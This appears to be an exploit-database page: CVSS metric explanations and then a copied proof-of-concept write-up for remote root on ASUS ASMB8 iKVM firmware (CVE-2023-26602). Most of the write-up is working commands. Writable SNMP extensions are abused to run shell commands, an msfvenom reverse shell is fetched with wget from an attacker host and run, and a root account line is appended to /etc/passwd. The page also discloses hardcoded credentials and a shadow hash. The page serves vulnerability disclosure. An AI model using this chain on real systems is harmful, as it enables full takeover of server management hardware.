The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: ASUS ASMB8 iKVM 1.14.51 SNMP Remote Root
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Exploit Title: ASUS ASMB8 iKVM RCE and SSH Root Access
# Date: 2023-02-16
# Exploit Author: [email protected] for NetworkSEC [NWSSA-002-2023]
# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
# CVE: CVE-2023-26602
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++
0x00 DESCRIPTION
++++++++++++++++++++
During a recent engagement, a remote server management interface has been
discovered. Furthermore, SNMPv2 was found to be enabled, offering write
access to the private community, subsequently allowing us to introduce
SNMP arbitrary extensions to achieve RCE.
We also found a hardcoded account sysadmin:superuser by cracking the
shadow file (md5crypt) found on the system and identifed an "anonymous"
user w/ the same password, however a lock seems to be in place to prevent
using these credentials via SSH (running defshell as default shell).
+++++++++++++++
0x01 IMPACT
+++++++++++++++
By exploiting SNMP arbitrary extension, we are able to run any command on
the system w/ root privileges, and we are able to introduce our own user
circumventing the defshell restriction for SSH.
+++++++++++++++++++++++++++++++
0x02 PROOF OF CONCEPT (PoC)
+++++++++++++++++++++++++++++++
At first, we have to create required extensions on the system, e.g. via
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
and if everything is set, we can just run that command by
snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
which will execute our defined command and show us its output.
+++++++++++++++++++++++++++++++
0x03 SSH Remote Root Access
+++++++++++++++++++++++++++++++
The identified RCE can be used to transfer a reverse tcp shell created
by msfvenom for arm little-endian, e.g.
msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
We can now transfer the binary, adjust permissions and finally run it:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
Again, we have to request execution of the lines in the MIB via:
snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
We get a reverse connection from the host, and can now act on the local system
to easily echo our own line into /etc/passwd:
echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
By setting the standard shell to /bin/sh, we are able to get a SSH root
shell into the system, effectively circumventing the defshell restriction.
$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
# uptime
15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
# head -n 1 /etc/shadow
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
---
#EOF
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum